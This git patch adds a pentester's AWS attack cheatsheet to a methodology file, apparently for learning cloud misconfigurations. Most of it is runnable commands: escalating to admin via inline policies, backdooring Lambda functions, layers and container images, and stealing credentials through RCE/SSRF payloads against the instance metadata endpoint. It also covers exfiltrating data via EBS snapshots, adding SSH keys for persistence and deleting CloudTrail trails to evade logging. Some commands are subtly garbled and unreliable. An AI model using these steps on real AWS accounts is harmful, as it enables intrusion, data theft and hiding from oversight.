2001 From: pop3ret <78824745+pop3ret@users.noreply.github.com> Date: Thu, 6 Oct 2022 13:43:09 -0300 Subject: [PATCH 61/69] Merge AWSome Pentesting into Cloud - AWS Pentest Merge the notes with the existing one --- .../Cloud - AWS Pentest.md | 1638 +++++++++++++++++ 1 file changed, 1638 insertions(+) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 1067bf4..e4cc372 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -688,6 +688,1644 @@ https://github.com/DenizParlak/Zeus * Ensure a log metric filter and alarm exist for route table changes * Ensure a log metric filter and alarm exist for VPC changes +# AWSome Pentesting Cheatsheet (By pop3ret) + +* This guide was created to help pentesters learning more about AWS misconfigurations and ways to abuse them. +* It was created with my notes gathered with uncontable hours of study and annotations from various places +* It's assumed that you have the AWS keys (~~This is not difficult to find, just look in developer's github~~) +* Author -> pop3ret + +# General Guidelines and tools + +* [Scout Suite](https://github.com/nccgroup/ScoutSuite) -> Security Healthcheck +* [Pacu](https://github.com/RhinoSecurityLabs/pacu) -> AWS Exploitation Framework +* [SkyArk](https://github.com/cyberark/SkyArk) -> Discover most privileged users within AWS infrastructure +* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) -> AWS SDK for python +* [AWS Consoler](https://github.com/NetSPI/aws_consoler) -> Convert AWS Credentials into a console access + + +# AWS Cheatsheet + +## Searching for open buckets + +``` +https://buckets.grayhatwarfare.com/ +``` + +## ARN + +A number to identify an object in AWS + +Example + +``` +arn:aws:iam:100:user/admin +``` + +1. Field -> ARN +2. Field -> Type, most of time will be AWS +3. Field -> service, in this case IAM +4. Field -> User ID +5. Field -> entity identifier + +# IAM +* It's assumed that we have gain access to the AWS Credentials +* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**) +* Always look for policies and roles with the * symbol. +* See which user do not have MFA enabled +* User enumeration in IAM Panel and group enumeration +* We can also enumerate roles from the same interface +* Root user is super admin + +## Configure AWS cli + +``` +aws configure +``` + +Or configure it using a profile + +``` +aws configure --profile example_name +``` + +The credential file is located in `~/.aws/credentials` + +## Listing IAM access Keys + +``` +aws iam list-acess-keys +``` + +## 1. Enumerating IAM users + +### Checking credentials for the user + +``` +aws sts get-caller-identity +``` + +### Listing IAM Users + +``` +aws iam list-users +``` + +### Listing the IAM groups that the specified IAM user belongs to + +``` +aws iam list-groups-for-user --user-name user-name +``` + +### Listing all manages policies that are attached to the specified IAM user + +``` +aws iam list-attached-user-policies --user-name user-name +``` + +### Listing the names of the inline policies embedded in the specified IAM user + +``` +aws iam list-user-policies --user-name user-name +``` + +## 2. Enumeration Groups IAM + +### Listing IAM Groups + +``` +aws iam list-groups +``` + +### Listing all managed policies that are attached to the specified IAM Group + +``` +aws iam list-attached-group-policies --group-name group-name +``` + +### Listing the names of the inline policies embedded in the specified IAM Group + +``` +aws iam list-group-policies --group-name group name +``` + +## 3. Enumeratig Roles + +### Listing IAM Roles + +``` +aws iam list-roles +``` + +### Listsing all managed policies that are attached to the specified IAM role + +``` +aws iam list-attached-role-policies --role-name role-name +``` + +### Listing the names of the inline policies embedded in the specified IAM role + +``` +aws iam list-role-policies --role-name role-name +``` + +## 4. Enumerating Policies + +### Listing of IAM Policies + +``` +aws iam list-policies +``` + +### Retrieving information about the specified managed policy + +``` +aws iam get-policy --policy-arn policy-arn +``` + +### Listing information about the versions of the specified manages policy + +``` +aws iam list-policy-versions --policy-arn policy-arn +``` + +### Retrieving information about the specific version of the specified managed policy + +``` +aws iam get-policy-version --policy-arn policy-arn --version-id version-id +``` + +### Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role + +``` +aws iam get-user-policy --user-name user-name --policy-name policy-name + +aws iam get-group-policy --group-name group-name --policy-name policy-name + +aws iam get-role-policy --role-name role-name --policy-name policy-name +``` + +## 5. Exploitation Scenario + +### General Guidelines +* AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it. + +### Enumerating the owner of the key and initial compromise + +``` +aws sts get-caller-identity +``` + +Or specifing a profile + +``` +aws sts get-caller-identity --profile example_name +``` + +If you have the password of the root account instead of key, log in + +``` +https://signin.aws.amazon.com/console +``` + +Or use the IAM in case the account is not the root + +``` +https://account-id-here.signin.aws.amazon.com/console +``` + +*The account id can be cathered using the sts get caller command.* + +### Privilege Escalation +* Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges. + +#### Study Case +* A user was compromised with the *List Policy* and *Put User Policy* permissions, an attacker could leverage this *Put User* privilege to add an inline administrator to itself, making it administrator of the instance. + +##### Exploitation +1. Getting the IAM user + +``` +aws sts get-caller-identity +``` + +2. Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name -- profile example_profile +``` + +3. Retrieving informations about an specific policy + +``` +aws iam get-policy --policy-arn policy_arn +``` + +If there are more than one version of the policy, we can also list them + +``` +aws iam list-policy-versions --policy-arn policy_arn +``` + +Now we can finally retrieve the contents of the policy + +``` +aws iam get-policy-version --policy-arn example_arn --version-id id_example +``` + +*It's important to use the command above to chech the information about the default policy* + +4. Escalation + +If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user. + +Administrator policy example + +```json +{ + "Version": "2021-10-17", + "Statement" : [ + { + "Effect":"Allow", + "Action": [ + "*" + ], + "Resource":[ + "*" + ] + } + ] +} +``` + +### Attaching this policy into our user + +``` +aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json +``` + +### Listing inline policies of our user + +``` +aws iam list-user-policies --user-name example_name +``` + +### Listing a restricted resource (Example S3) + +``` +aws s3 ls --profile example_profile +``` + +### Interesting Permissions + +* iam:AttachUserPolicy -> Attach a policy to a user +* iam:AttachGroupPolicy -> Attach a policy to a group +* iam:AttachRolePolicy -> Attach a policy to a role +* iam:CreateAccessKey -> Creates a new access key +* iam:CreateLoginProfile -> Creates a new login profile +* iam:UpdateLoginProfile -> Update an existing login profile +* iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile +* iam:PuserUserPolicy -> Create/Update an inline policy +* iam:PutGroupPolicy -> Create/Update an inline policy for a group +* iam:PutRolePolicy -> Create/Update an inline policy for a role +* iam:AddUserToGroup -> Add an user to a group +* iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role +* iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it +* lambda:UpdateFunctionCode -> Update the code of an existing lambda function + +### Persistence & Backdooring +* Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access. + +#### Creating a new acess key for another user + +``` +aws iam create-access-key --username example_username +``` + +#### Configuring AWS cli for the new user + +``` +aws configure --profile example_profile +``` + +*Remember, an user can have the maximum of 2 access keys*. + +#### Testing the credential + +``` +aws sts get-caller-identity --profile example_profile +``` + +#### Accessing more credentials +* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance) + +##### Listing managed policies attached to an user + +``` +aws iam list-attached-user-policies --user-name example_name +``` + +##### Retrieving information about an specific policy + +``` +aws iam get-policy --policy-arn ARN +``` + +##### Listing information about the version of the policy + +``` +aws iam list-policy-versions --policy-arn ARN +``` + +##### Retrieving information about an specific version + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Listing IAM roles + +``` +aws iam list-roles +``` + +##### Listing trust relashionship between role and user (Which roles we can assume) + +``` +aws iam get-role --role-name role_name +``` + +##### Listing all managed policies attached to the specific IAM role + +``` +aws iam liast-attached-role-policies --role-name role_name +``` + +##### Retrieving information about the specified version of the policy + +``` +aws iam get-policy-version --policy-arn policy_arn --version-id ID +``` + +##### Getting temporary credentials for the role + +``` +aws sts assume-role --role-arn role_arn --role-session-name session_name +``` + +##### Configuring AWS cli with newer credentials (On Linux) + +``` +export AWS_ACCESS_KEY_ID +export AWS_SECRET_KEY +export AWS_SESSION_TOKEN +``` + +##### Getting information about the temporary credential + +``` +aws sts get-caller-identity +``` + +# S3 - Simple Storage System + +* Storage system that allow users to store and retrieve data. +* List,Get,Put and Delete operations can be performed on the objects of the bucket +* Buckets are global, meaning that they are available to all regions +* It's possible to bruteforce the bucket name and region in the URL +* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level +* There is also time limited URL's and identity based policies +* Identity policies are enumerated using IAM commands + +## Enumeration + +### Listing all buckets in aws account + +``` +aws s3api list-buckets +``` + +### Getting information about a specific bucket + +``` +aws s3api get-bucket-acl --bucket name +``` + +### Getting information about a specific bucket policy + +``` +aws s3api get-bucket-policy --bucket name +``` + +### Getting the Public Access Block configuration for an S3 bucket + +``` +aws s3api get-public-access-block --bucket name +``` + +### Listing all objects in a specific bucket + +``` +aws s3api list-objects --bucket name +``` + +### Getting ACL information about specific object + +``` +aws s3api get-object-acl --bucket-name name --key object_name +``` + +## Data Exfiltration +* It's possible to brute-force files in the bucket +* If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL. + +### Public Access + +* Just enter the URL in the browser + +``` +https://bucket-name.region.amazonaws.com/secret.txt +``` + +### Authenticated User + +``` +aws s3api get-object --bucket name --key object-name download-file-location +``` + +### Time-Based Url + +* Generate a time based url for an object +* Userful if the object is not public + +``` +aws s3 presign s3://bucket-name/object-name --expires-in 605000 +``` + +# Lambda & API Gateway +* Serverless event driven platform +* Runs code in response to events and automatically manages computing resources required by that code +* Can trigger from other AWS services or call directly from the API Gateway +* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source +* API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API +* API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way. +* If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files. +* If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL). + +## Enumeration + +### Listing All lambda functions + +``` +aws lambda list-functions +``` + +### Listing information about a specific lambda function + +``` +aws lambda get-function --function-name function_name +``` + +* *This command enables us to download the source code of the lambda function* + +### Listing policy information about the function + +``` +aws lambda get-policy --function-name function_name +``` + +* We can get informations like who can execute this functions, ID and other informations with this command + +### Listing the event source mapping information about a lambda function + +``` +aws lambda list-event-source-mappings --function-name function_name +``` + +### Listing Lambda Layers (Depedencies) + +``` +aws lambda list-layers +``` + +### Listing full information about a lambda layer + +``` +aws lambda get-layer-version --layer-name name --version-number version_number +``` + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. + +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Listing API KEYS + +``` +aws apigateway get-api-keys --include-values +``` + +### Getting information about a specific API Key + +``` +aws apigateway get-api-key --api-key KEY +``` + +## Initial Access + +* Its possible to get RCE through API Gateway if it executes commands. +* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation. + +## Credential Access + +Getting credentials from Lambda can be done in 2 ways + +1. Keys in the source code +2. Keys in the enviroment variables + +These keys can be gathered using SSRF, RCE and so on. + +### Getting credentials using RCE + +``` +https://apigateway/prod/system?cmd=env +``` + +### Getting credentials using SSRF + +``` +https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next +``` + +### Getting credentials using SSRF and wrappers + +``` +https://apigateway/prod/system?cmd=file:///proc/self/environ +``` + +### Getting credentials from lambda enviroment variables (cli) + +``` +aws lambda get-function --function-name NAME +``` + +* It's important to enumerate the functions first with `aws lambda list-functions` + +## Persistence +* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute. +* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect. + +### Checking which user is executing + +``` +aws sts get-caller-identity +``` + +### Checking all managed policies attached to the user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +### Checking informations about a specific policy + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +### Listing all lambda functions + +``` +aws lambda list-functions --region region +``` + +### Listing information about the specified lambda + +``` +aws lambda get-function --function-name name +``` + +* Download and analyze the codes + +### Listing policy information about the specific lambda function + +``` +aws lambda get-policy --function-name name --profile profile --region region +``` + +* We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function). + +### Listing Rest API'S + +``` +aws apigateway get-rest-apis +``` + +### Listing information about a specific API + +``` +aws apigateway get-rest-api --rest-api-id ID +``` + +### Listing information about endpoints + +``` +aws apigateway get-resources --rest-api-id ID +``` + +### Listing information about a specific endpoint + +``` +aws apigateway get-resource --rest-api-id ID --resource-id ID +``` + +### Listing method information for the endpoint + +``` +aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method +``` + +* Test various methods to see if the API supports it. + +### Listing all versions of a rest api + +``` +aws apigateway get-stages --rest-api-id ID +``` + +### Getting informatin about a specific version + +``` +aws apigateway get-stage --res-api-id ID --stage-name NAME +``` + +### Uploading the backdoor code to aws lambda function + +``` +aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip +``` + +### Invoke the Function + +``` +curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE +``` + +Where + +1. API-ID -> uj3948ie +2. Region -> us-east-2 +3. Resource (Endpoint) -> EXAMPLE +4. Method -> Get +5. Stage (Version) -> default +6. API-Key -> None + +*All these details are gathered during the enumeration.* + +## Privilege Escalation +* If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator. + +### Create a lambda function and attach a role to it + +``` +aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region +``` + +* Inside the function's code, we will add the administrator permission to the role and to the user + +#### Example code to add the permissions + +```python +import boto3 +import json + +def handler(event,context) + iam = boto3.client("iam") + iam.attach.role.policy(RoleName="name",PolicyArn="arn",) + iam.attach.user.policy(UserName="name",PolicyArn="arn",) + return { + 'statusCode':200 + 'body':json.dumps("Pwned") + } +``` + +### Invoke a lambda function + +``` +aws lambda invoke --function-name name response.json --region region +``` + +### Listing managed policies to see if the change worked + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +# AWS Secret Manager + +* AWS Service that encrypts and store secrets +* Transparently decrypts and return in plaintext +* KMS used to store keys (AWS Key and Customer Managed Key) +* Asymmetric and Symmetric keys can be created using KMS + + +## Enumeration + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting policies attached to the specified secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Listing keys in KMS + +``` +aws kms list-keys +``` + +### Listing information about a specific key + +``` +aws kms describe-key --key-id ID +``` + +### Listing policies attached to a specific key + +``` +aws kms list-key-policies --key-id ID +``` + +### Getting full information about a policy + +* Shows who can access the keys + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +## Credential Exfiltration + +* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API + +### Listing policies attached to an user + +``` +aws iam list-attached-user-policies --user-name name +``` + +### Retrieving information about a specific version of policy + +* Here we can see the permissions + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Listing all secrets stored by Secret Manager + +``` +aws secretsmanager list-secrets +``` + +### Listing information about a specific secret + +* Here we get the secret Key Id to descript the secret + +``` +aws secretsmanager describe-secret --secret-id name +``` + +### Getting resource-based policy attached to an specific secret + +``` +aws secretsmanager get-resource-policy --secret-id ID +``` + +### Getting the secret value + +* Retrieves the actual value + +``` +aws secretsmanager get-secret-value --secret-id ID +``` + +### KMS + +* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS. + +#### Listing an specific key + +``` +aws kms describe-key --key-id id +``` + +#### Listing policies attached to an specified key + +* Here we can see who can access the key, the description of it and so on + +``` +aws kms list-key-policies --key-id ID +``` + +#### Listing full information about a policy + +* Run the previous command in all keys to see who can access it + +``` +aws kms get-key-policy --policy-name name --key-id ID +``` + +#### Decrypt the secret using the key + +* There is no need to specificy the key information because this information is embbeded in the encrypted file + +``` +aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext +``` + +# Containers + +Divided into three categories + +* Registry -> Secure place to store container images (ECR) +* Orchestration -> Configure when and where the containters run (ECS,EKS) +* Compute -> Use to do computing related tasks (EC2, Fargate) +* Its possible to create a backdoor image and add to a EKS cluster +* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster + +## Initial Access + +* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2. + +After the RCE, we can list all secrets in EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount +``` + +### Getting the secret information from EKS + +``` +https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token +``` + +* It's also possible to do sandbox escaping (Tool: ``deepce``) + +## Enumeration + +### ECR + +#### Listing all repositories in container registry + +``` +aws ecr describe-repositories +``` + +#### Listing information about repository policy + +``` +aws ecr get-repository-policy --repository-name name +``` + +#### Listing all images in a specific repository + +``` +aws ecr list-images --repository-name name +``` + +#### Listing information about an image + +``` +aws ecr describe-images --repository-name name --images-ids imageTag=name +``` + +### ECS + +#### Listing all ECS clusters + +``` +aws ecs list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws ecs describe-clusters --cluster name +``` + +#### Listing all services in specified cluster + +``` +aws ecs list-services --cluster name +``` + +#### Listing information about an specific service + +``` +aws ecs descibe-services --cluster name --services name +``` + +* This command shows the logs of the service + +#### Listing tasks in specific cluster + +``` +aws ecs list-tasks --cluster name +``` + +#### Listing information about an specific task + +``` +aws ecs describe-tasks --cluster name -tasks taskArn +``` + +* Also shows information about network, userful if trying to pivot + +#### Listing all containers in specified cluster + +``` +aws ecs list-container-instances --cluster name +``` + +### EKS + +#### Listing all EKS clusters + +``` +aws eks list-clusters +``` + +#### Listing information about an specific cluster + +``` +aws eks describe-cluster --name name +``` + +#### Listing all node groups in specified cluster + +``` +aws eks list-nodegroups --cluster-name name +``` + +#### Listing specific information about a node group in a cluster + +``` +aws eks describe-nodegroup --cluster-name name --nodegroup-name name +``` + +#### Listing Fargate in specified cluster + +``` +aws eks list-fargate-profiles --cluster-name cluster-name +``` + +#### Listing information about a fargate profile in a cluster + +``` +aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name +``` + +## Persistence + +* It's possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server. + +### Enumerating the user + +``` +aws sts get-caller-identity +``` + +### Listing manager policies attached to the IAM role + +``` +aws iam list-attached-role-policies --role-name name +``` + +### Getting information about the version of the managed policy + +``` +aws iam get-policy-version --policy-arn arn --version-id id +``` + +### Getting information about the repositories in container registry + +``` +aws ecr describe-repositories +``` + +### Listing all images in the repository + +``` +aws ecr list-images --repository-name name +``` + +### Listing information about an image + +``` +aws ecr describe-images --repository-name name --image-ids imageTag=Name +``` + +### Authenticate the docker daemon to ECR + +``` +aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address +``` + +### Building images with backdoor + +``` +docker build -t image_name +``` + +### Tagging the docker image + +``` +docker tag image_name ecr_addr:Image_Name +``` + +### Pushing the image to ECR + +``` +docker push ecr_addr:Image_Name +``` + +# EC2 + +* AMI, images used to create virtual machines +* It's possible to create a malicious image to compromise users +* We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager +* The SSH Key method is permanent, we need to gather the private key to connect to the instance +* EC2 Instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance +* Session manager only work in browser and it does not need SSH Key +* Windows machines can be accessed by using RDP, Session Manager +* Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level. + +## Enumeration + +### Listing information about all instances + +``` +aws ec2 describe-instances +``` + +### Listing information about a specific region + +``` +aws ec2 describe-instances --region region +``` + +### Listing information about specific instance + +``` +aws ec2 describe-instances --instance-ids ID +``` + +### Extracting UserData attribute of specified instance + +``` +aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID +``` + +*This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded* + +### Listing roles of an instance + +``` +aws ec2 describe-iam-instance-profile-associations +``` + +## Exploitation +* Initial access can happen by RCE or SSRF +* Metadata can be used to exfiltrate information from the instance + +### Remote code execution + +#### AWS Metadata +If we have remote code execution or SSRF, we can grab metadata information + +``` +curl http://169.254.169.254/latest/meta-data +``` + +##### Grabbing the keys to access the instance + +``` +curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance +``` + +##### Grabbing the keys in metadata version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/meta-data/ +``` + +#### AWS Userdata + +Version 1 + +``` +curl http://169.254.169.254/latest/user-data/ +``` + +Version 2 + +```bash +TOKEN=`curl +X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data/ +``` + +### Privilege Escalation +* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection. +* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services. + +#### Getting information about the key + +``` +aws sts get-caller-identity +``` + +#### Getting policies attached to the IAM user + +``` +aws iam list-attached-user-policies --user-name user_name +``` + +#### Getting information about a specific policy version + +``` +aws iam get-policy-version --policy-arn ARN --version-id ID +``` + +To attach a role to an EC2 instance, we can use the RCE to grab the ID + +``` +curl http://169.254.169.254/latest/meta-data/instance-id +``` + +#### Listing instance profiles + +``` +aws iam list-instance-profiles +``` + +#### Attach an instance profile to an EC2 instance + +``` +aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName +``` + +### Credential Access + +* We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on) + +#### After the initial access +1. Enumerate the key (Role) + +``` +aws sts get-caller-identity +``` + +2. If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2) + +``` +curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND +``` + +3. Configure the aws cli + +``` +aws configure +``` + +Or use enviroment variables. + +### Persistence +* All the persistence techniques works here, SSH persistence, vim backdoor and so on. + +#### SSH Persistence example + +1. Generate SSH Key pair + +``` +ssh-keygen +``` + +2. Add public key to authorized_keys + +``` +echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys +``` + +3. Use the private key to connect + +``` +ssh -i public_key user@instance +``` + +# Elastic Block Store +* Block storage system used to store persistent data +* It's possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable). +* It's possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot. +* It's possible to attach the snapshot (Backup of BS) to an EC2 instance +* Snapshots can be used as volumes or AMI's + +## Enumeration + +### Enumerating EBS volumes + +``` +aws ec2 describe-volumes +``` + +* If the volume is available, it can be attached to an EC2 instance +* Check if the EBS is encrypted + +### Enumerating Snapshots + +``` +aws ec2 describe-snapshots --owner-ids self +``` + +* Also check if the snapshot is encrypted + +## Exploitation & Data Exfiltration +* Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance. +* User need to have IAM permissions on EC2 +* Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine. + +### Creating a snapshot of a specified volume + +``` +aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name +``` + +### Listing snapshots + +``` +aws ec2 describe-snapshots +``` + +### Creating a volume from a snasphot + +``` +aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name +``` + +* The volume needs to be in the same availability zone as the instance we have access + +### Attaching the volume to an instance + +``` +aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value +``` + +### Mounting the volume + +``` +sudo mount /dev/sdfd /directory +``` + +After mounting, we will have access to the disk. + +# RDS - Relational Database Service + +* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar) +* The access is done by using password, password+IAM or password+kerberos +* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip. +* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials. + +## Enumeration + +### Listing information about clusters in RDS + +``` +aws rds describe-db-clusters +``` + +### Listing information about RDS instances + +``` +aws rds describe-db-instances +``` + +* IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance + +### Listing information about subnet groups in RDS + +``` +aws rds describe-db-subnet-groups +``` + +### Listing information about database security groups in RDS + +``` +aws rds describe-db-security-groups +``` + +### Listing information about database proxies + +``` +aws rds describe-db-proxies +``` + +## Data exfiltration + +* If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect) + +### List instances in RDS + +``` +aws rds describe-db-instances +``` + +### List information about the specified security group + +``` +aws ec2 describe-security-groups --group-ids id +``` + +### Password based authentication + +``` +mysql -h hostname -u name -P port -p password +``` + +### IAM Based authentication + +**1. Identify the user** + +``` +aws sts get-caller-identity +``` + +**2. List all policies attached to a role** + +``` +aws iam list-attached-role-policies --role-name name +``` + +**3. Get information about a specific version of a policy** + +``` +aws iam get-policy-version --policy-arn arn --version-id ID +``` + +**4. Get a temporary token from the RDS** + +``` +aws rds generate-db-auth-token --hostname hostname --port port --username username --region region +``` + +* To be easier, we can put it in a variable + +``` +TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region) +``` + +**5. Connect to the DB using the token** + +``` +mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN +``` + +# SSO & Other Services + +## Single Sign On (SSO) + +* Used to centrally manage access to multiple AWS accounts and applications. +* Provide users a way to interact with all services and applications through one place +* Can be used to manage access and user permissions to all AWS accounts +* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar) + +## CloudTrail + +* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account +* Provide event history of AWS account activity, SDKs, command line tools and other services +* Commonly used to detect unsual behavior in AWS account +* Pacu automatically changes the user agent to deceive the logs of cloudtrail + +### Userful Commands + +#### List trails + +``` +aws cloudtrail list-trails +``` + +#### Disabling CloudTrail + +``` +aws cloudtrail delete-trail --name example_trail --profile name +``` + +#### Disable monitoring of events from global events + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event +``` + +#### Disable CloudTrail on specific regions + +``` +aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + +## AWS Shield + +* Used to protect services from Denial of Service Attacks +* There are 2 versions, the standard and the Advanced + +## AWS Waf + +* Used to protect applications against common web application attacks +* Common WAF bypasses can be tested against it +* To detect an WAF, we can use `wafw00f` + +## AWS Inspector + +* Automated security assessment service that helps improve the security and compliance of applications on AWS +* Works with an agent + +## AWS Guard Duty + +* Threat detection service that monitors for malicious activity and unauthorized behavior +* Works by collecting and analyzing logs + +# Virtual Private Cloud + +* Used to create an isolated infrastructure within the cloud, including subnets and so on. +* If the VPC has an internet gateway, means its a public subnet +* Every VPC can have Network ACL's + +## Routing Tables + +A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows + +``` +DESTINATION TARGET + +IP local -> VPC Internal +IP igw -> Internet Gateway +IP nat -> NAT Gateway +IP pcx -> VPC Peering +IP vpce -> VPC Endpoint +IP vgw -> VPN Gateway +IP eni -> Network Interface +``` + +* VPC Internal -> Internal IP, no internet connection +* Internet Gateway -> Used to access the internet +* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet +* VPC Peering -> Allows the communication between 2 VPC's +* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway) +* VPN Gateway -> Used to expand the cloud to on premises and vice-versa +* Network Interface -> Network Interfaces + +## Enumeration + +### Listing VPC's + +``` +aws ec2 describe-vpcs +``` + +### Listing VPC's specifing the region + +``` +aws ec2 describe-vpcs --region us-west-1 +``` + +### Listing VPC information by ID + +``` +aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID" +``` + +### Listing subnet's + +``` +aws ec2 describe-subnets +``` + +### Listing subnet's by VPC-id + +``` +aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" +``` + +### Listing routing tables + +``` +aws ec2 describe-route-tables +``` + +### Listing routing tables by VPC-id + +``` +aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" +``` + +### Listing Network ACL's + +``` +aws ec2 describe-network-acls +``` + +## Lateral Movement and Pivoting + +* We can abuse VPC peering to do lateral movement + +### Scenario + +* There are 3 VPC's -> A,B,C +* A can acess B through peering and B access C. We can use VPC B as a peering pivot to acess VPC C from VPC A. +* The lateral movement can be done if we gather keys or other machines +* Always enumerate the subnets to see in which 